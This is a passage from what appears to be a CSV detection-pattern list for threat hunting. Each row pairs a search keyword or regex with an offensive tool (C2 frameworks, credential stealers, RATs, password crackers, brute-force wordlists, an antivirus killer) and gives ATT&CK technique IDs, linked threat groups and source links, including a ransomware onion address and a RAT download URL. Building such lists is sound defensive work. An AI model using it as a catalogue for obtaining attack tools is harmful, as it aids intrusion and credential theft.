"*WMI-ProcessCreate.cpp*",".{0,1000}WMI\-ProcessCreate\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","62996"
"*WMIReg.exe*",".{0,1000}WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62997"
"*wmispawn select*",".{0,1000}wmispawn\sselect.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62998"
"*WmiSploit.git*",".{0,1000}WmiSploit\.git.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","62999"
"*WmiSploit-master/zip*",".{0,1000}WmiSploit\-master\/zip.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","63000"
"*WNFarmDynamite_h.cs*",".{0,1000}WNFarmDynamite_h\.cs.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","63001"
"*wolfexp.net/other/Gh0st_RAT/demo.rar*",".{0,1000}wolfexp\.net\/other\/Gh0st_RAT\/demo\.rar.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","63002"
"*woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad.onion*",".{0,1000}woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63003"
"*word_gen_b_varlen.*",".{0,1000}word_gen_b_varlen\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63004"
"*word_unc_injector.*",".{0,1000}word_unc_injector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63005"
"*Wordlist/ftp_p.txt*",".{0,1000}Wordlist\/ftp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63006"
"*Wordlist/ftp_u.txt*",".{0,1000}Wordlist\/ftp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63007"
"*Wordlist/ftp_up.txt*",".{0,1000}Wordlist\/ftp_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63008"
"*Wordlist/mssql_up.txt*",".{0,1000}Wordlist\/mssql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63009"
"*Wordlist/mysql_up.txt*",".{0,1000}Wordlist\/mysql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63010"
"*Wordlist/oracle_up.txt*",".{0,1000}Wordlist\/oracle_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63011"
"*Wordlist/pass.txt*",".{0,1000}Wordlist\/pass\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63012"
"*Wordlist/pop_p.txt*",".{0,1000}Wordlist\/pop_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63013"
"*Wordlist/pop_u.txt*",".{0,1000}Wordlist\/pop_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63014"
"*Wordlist/postgres_up.txt*",".{0,1000}Wordlist\/postgres_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63015"
"*Wordlist/smtp_p.txt*",".{0,1000}Wordlist\/smtp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63016"
"*Wordlist/smtp_u.txt*",".{0,1000}Wordlist\/smtp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63017"
"*Wordlist/snmp.txt*",".{0,1000}Wordlist\/snmp\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63018"
"*Wordlist/sql_p.txt*",".{0,1000}Wordlist\/sql_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63019"
"*Wordlist/sql_u.txt*",".{0,1000}Wordlist\/sql_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63020"
"*Wordlist/ssh_p.txt*",".{0,1000}Wordlist\/ssh_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63021"
"*Wordlist/ssh_u.txt*",".{0,1000}Wordlist\/ssh_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63022"
"*Wordlist/ssh_up.txt*",".{0,1000}Wordlist\/ssh_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63023"
"*Wordlist/telnet_p.txt*",".{0,1000}Wordlist\/telnet_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63024"
"*Wordlist/telnet_u.txt*",".{0,1000}Wordlist\/telnet_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63025"
"*Wordlist/telnet_up.txt*",".{0,1000}Wordlist\/telnet_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63026"
"*Wordlist/user.txt*",".{0,1000}Wordlist\/user\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63027"
"*Wordlist/vnc_p.txt*",".{0,1000}Wordlist\/vnc_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63028"
"*Wordlist/windows_u.txt*",".{0,1000}Wordlist\/windows_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63029"
"*Wordlist/windows_up.txt*",".{0,1000}Wordlist\/windows_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63030"
"*wordlist_TLAs.txt*",".{0,1000}wordlist_TLAs\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63031"
"*--wordlist=*-passwords.txt*",".{0,1000}\-\-wordlist\=.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","63032"
"*wordlist-nthash-reversed*",".{0,1000}wordlist\-nthash\-reversed.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","63033"
"*wordlist-probable.txt*",".{0,1000}wordlist\-probable\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63034"
"*wordlists*all_in_one.7z*",".{0,1000}wordlists.{0,1000}all_in_one\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63035"
"*wordlists*rmg.txt*",".{0,1000}wordlists.{0,1000}rmg\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","63036"
"*wordlists*rmiscout.txt*",".{0,1000}wordlists.{0,1000}rmiscout\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","63037"
"*wordlists/dynamic-all.txt*",".{0,1000}wordlists\/dynamic\-all\.txt.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","63038"
"*wordlists/fasttrack.txt*",".{0,1000}wordlists\/fasttrack\.txt.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","63039"
"*wordlists/rockyou.txt'*",".{0,1000}wordlists\/rockyou\.txt\'.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","63040"
"*wordlists/subdomains-5000.txt*",".{0,1000}wordlists\/subdomains\-5000\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","63041"
"*wordlists/top1million.txt*",".{0,1000}wordlists\/top1million\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","63042"
"*workingKeyLog has been pushed to key log file!*",".{0,1000}workingKeyLog\shas\sbeen\spushed\sto\skey\slog\sfile!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","63043"
"*WorkNew19\KillAV\Release\KillAV.pdb*",".{0,1000}WorkNew19\\KillAV\\Release\\KillAV\.pdb.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63044"
"*WorldWind Stealer.zip*",".{0,1000}WorldWind\sStealer\.zip.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","Malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","N/A","10","1","20","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z","63045"
"*WorldWind-Stealer*",".{0,1000}WorldWind\-Stealer.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","Malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","N/A","10","1","20","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z","63046"
"*Wow, Dirty CoW reloaded!*",".{0,1000}Wow,\sDirty\sCoW\sreloaded!.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","63048"
"*wpapcap2john.*",".{0,1000}wpapcap2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63049"
"*wp-exploitable-plugins.txt*",".{0,1000}wp\-exploitable\-plugins\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63050"
"*wpscan --api-token *",".{0,1000}wpscan\s\-\-api\-token\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63051"
"*wpscan --url *",".{0,1000}wpscan\s\-\-url\s.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","0","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63052"
"*wpscanteam/tap/wpscan*",".{0,1000}wpscanteam\/tap\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","1","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63053"
"*wpscanteam/wpscan*",".{0,1000}wpscanteam\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","1","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63054"
"*Wr173F0rF113(*",".{0,1000}Wr173F0rF113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63055"
"*Wra7h/SingleDose*",".{0,1000}Wra7h\/SingleDose.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","63056"
"*wraith-labs/wraith*",".{0,1000}wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","63057"
"*wrap_execute_assembly*",".{0,1000}wrap_execute_assembly.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63058"
"*wrap_execute_encoded_powershell*",".{0,1000}wrap_execute_encoded_powershell.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63059"
